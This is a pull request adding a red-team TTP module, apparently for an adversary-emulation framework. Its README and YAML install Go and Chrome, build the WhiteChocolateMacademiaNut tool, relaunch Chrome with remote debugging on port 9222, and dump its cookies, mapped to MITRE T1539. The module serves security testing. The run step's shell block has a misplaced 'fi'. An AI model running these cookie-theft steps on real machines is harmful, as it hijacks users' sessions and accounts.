### PR TITLE
Added TTP Module for extract-cookies-from-chromium-browser

### DIFF
--- a/ttps/credential-access/extract-cookies-from-chromium-browser/README.md
+++ b/ttps/credential-access/extract-cookies-from-chromium-browser/README.md
@@ -1,0 +1,58 @@
+# Extract Cookies with Chromium Browser via Remote Debugger Port
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-blue)
+
+This TTP extracts cookies from Chromium-based browsers from a target system using the WhiteChocolateMacademiaNut tool. It currently works on macOS with Google Chrome, but can easily be extended to Microsoft Edge browser and to work on Linux (via apt) and Windows (via Chocolately).
+
+## Pre-requisites
+
+1. The executor can run as the current user on the target system.
+2. The WhiteChocolateMacademiaNut tool must be accessible via a remote repository.
+3. A Package manager is required such as Homebrew which will download and install the necessary tools such as Golang and Google Chrome.
+
+## Examples
+
+You can run the TTP using the following example:
+```bash
+ttpforge run forgearmory//credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml
+```
+
+## Steps
+1. **setup**: This step checks the current operating system. Currently, it checks if brew is installed. If brew is installed it will download and install Golang and Chrome.
+2. **clone-whitecocolatemacademianut**: This step clones the WhiteChocolateMacademiaNut repository from GitHub. This will checkout commit b024f72f6350fb62853f06052a8431d20e76db7a. A cleanup step is also provided to remove the repository post-execution.
+3. **build-whitecocolatemacademianut**: This step uses golang and build WhiteChocolateMacademiaNut allowing it to work on its respective operating system.
+4. **run-whitecocolatemacademianut**: This step opens up Chrome and navigates to google.com and then the process is killed. Afterwards, Chrome is opened with remote debugger port on port 9222. WhiteChocolateMacademiaNut is then ran to steal the cookies. If the execution status is successful (0), the TTP exits with a success message. Otherwise, it exits with an error message.
+
+
+## Manual Reproduction Steps
+
+```
+# Assuming Homebrew is present, install Golang and Google Chrome
+brew install golang
+brew install --cask google-chrome
+
+# Clone and build WhiteChocolateMacademiaNut
+git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut
+cd WhiteChocolateMacademiaNut
+go mod init github.com/slyd0g/WhiteChocolateMacademiaNut
+go get github.com/akamensky/argparse
+go get golang.org/x/net/websocket
+go build -o WhiteChocolateMacademiaNut
+
+# Simulate browser activity
+open -a "Google Chrome" "https://www.google.com" &
+killall "Google Chrome" 
+
+# Open Chrome with remote debugger port
+"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
+
+# Run WhiteChocolateMacademiaNut
+./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw
+```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0006 Credential Access
+- **Techniques**:
+  - T1539 Steal Web Session Cookie

--- a/ttps/credential-access/extract-cookies-from-chromium-browser/README.md
+++ b/ttps/credential-access/extract-cookies-from-chromium-browser/README.md
@@ -41,7 +41,7 @@ go build -o WhiteChocolateMacademiaNut
 
 # Simulate browser activity
 open -a "Google Chrome" "https://www.google.com" &
-killall "Google Chrome" 
+killall "Google Chrome"
 
 # Open Chrome with remote debugger port
 "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &

--- a/ttps/credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml
+++ b/ttps/credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml
@@ -1,0 +1,106 @@
+---
+api_version: 2.0
+uuid: 2cd87e28-d207-4cc2-9b61-644e32aeba61
+name: extract-cookies-from-chromium-browser
+description: Runs chromium-based browsers in debugger port and extracts cookies
+requirements:
+  platforms:
+    - os: darwin
+  superuser: false
+mitre:
+  tactics:
+    - TA0006 Credential Access
+  techniques:
+    - T1539 Steal Web Session Cookie
+steps:
+  - name: setup
+    inline: |
+      # Determine the operating system
+      OS=$(uname)
+      if [[ "$OS" == "Darwin" ]]; then
+
+        # Confirm that brew package manager is installed
+        if ! command -v brew &> /dev/null; then
+          echo "===> Error: Brew package manager is not installed on the current system. Please install to proceed."
+          exit 1
+        else
+          echo "===> Confirmed: Brew is installed."
+
+          # Confirm that golang utility is installed. If not, install it.
+          if ! command -v go &> /dev/null; then
+            echo "===> Error: Golang is not installed on the current system. Installing now."
+            brew install golang
+            if [ $? -ne 0 ]; then
+              echo "===> Error: Failed to install Golang."
+              exit 1
+            fi
+          else
+            echo "===> Confirmed: Golang is installed."
+          fi
+
+          # Confirm that Google Chrome is installed
+          if [ -d "/Applications/Google Chrome.app" ]; then
+            echo "===> Confirmed: Google Chrome is installed."
+          else
+            echo "===> Error: Goolge Chrome is not installed on the current system. Installing now."
+            brew install --cask google-chrome
+            if [ $? -ne 0 ]; then
+              echo "===> Error: Failed to install Google Chrome."
+              exit 1
+            fi
+          fi
+        fi
+      else
+        echo "Unsupported operating system."
+        exit 27
+      fi
+  - name: clone-whitecocolatemacademianut
+    inline: |
+      git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut
+      cd WhiteChocolateMacademiaNut
+      git checkout b024f72f6350fb62853f06052a8431d20e76db7a
+    cleanup:
+      inline: |
+        echo "Removing WhiteChocolateMacademiaNut git repository"
+        rm -rf WhiteChocolateMacademiaNut
+
+  - name: build-whitecocolatemacademianut
+    inline: |
+      cd WhiteChocolateMacademiaNut
+      go mod init github.com/slyd0g/WhiteChocolateMacademiaNut
+      go get github.com/akamensky/argparse
+      go get golang.org/x/net/websocket
+      go build -o WhiteChocolateMacademiaNut
+
+  - name: run-whitecocolatemacademianut
+    inline: |
+      # Determine the operating system
+      OS=$(uname)
+      if [[ "$OS" == "Darwin" ]]; then
+        # Open Chrome 
+        open -a "Google Chrome" "https://www.google.com" &
+        sleep 5
+
+        # Kill Chrome Process
+        killall "Google Chrome" 
+
+        # Open Chrome with remote debugger port
+        "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
+        sleep 5
+
+        cd WhiteChocolateMacademiaNut
+        ./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw
+        if [ $? -ne 0 ]; then
+          echo "Failed to run WhiteChocolateMacademiaNut."
+          killall "Google Chrome" 
+          exit 1
+        else
+          echo "TTP Ran Successfully"
+          killall "Google Chrome" 
+          exit 0
+        fi
+      fi
+      else
+        echo "Unsupported operating system."
+        exit 27
+      fi

--- a/ttps/credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml
+++ b/ttps/credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml
@@ -77,12 +77,12 @@ steps:
       # Determine the operating system
       OS=$(uname)
       if [[ "$OS" == "Darwin" ]]; then
-        # Open Chrome 
+        # Open Chrome
         open -a "Google Chrome" "https://www.google.com" &
         sleep 5
 
         # Kill Chrome Process
-        killall "Google Chrome" 
+        killall "Google Chrome"
 
         # Open Chrome with remote debugger port
         "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
@@ -92,11 +92,11 @@ steps:
         ./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw
         if [ $? -ne 0 ]; then
           echo "Failed to run WhiteChocolateMacademiaNut."
-          killall "Google Chrome" 
+          killall "Google Chrome"
           exit 1
         else
           echo "TTP Ran Successfully"
-          killall "Google Chrome" 
+          killall "Google Chrome"
           exit 0
         fi
       fi


### PR DESCRIPTION
# Proposed Changes

I've added a new TTP module for extract-cookies-from-chromium-browser for T1539 Steal Web Session Cookie using https://github.com/slyd0g/WhiteChocolateMacademiaNut. It's a very powerful technique by Justin Bui that does not require root access.

It is working on macOS Sonoma 14.5 using Google Chrome browser. But it can easily be extended to Linux via apt and Windows via Chocolately.

## Related Issue(s)

N/A

## Testing

Tested on macOS Sonoma 14.5, just run:

`ttpforge run forgearmory//credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml`

## Documentation

Please see the README.md

## Screenshots/GIFs (optional)

N/A

## Checklist

- [x] Ran `mage runprecommit` locally and fixed any issues that arose.
- [x] Curated your commit(s) so they are legible and easy to read and understand.
- [ ] 🚀
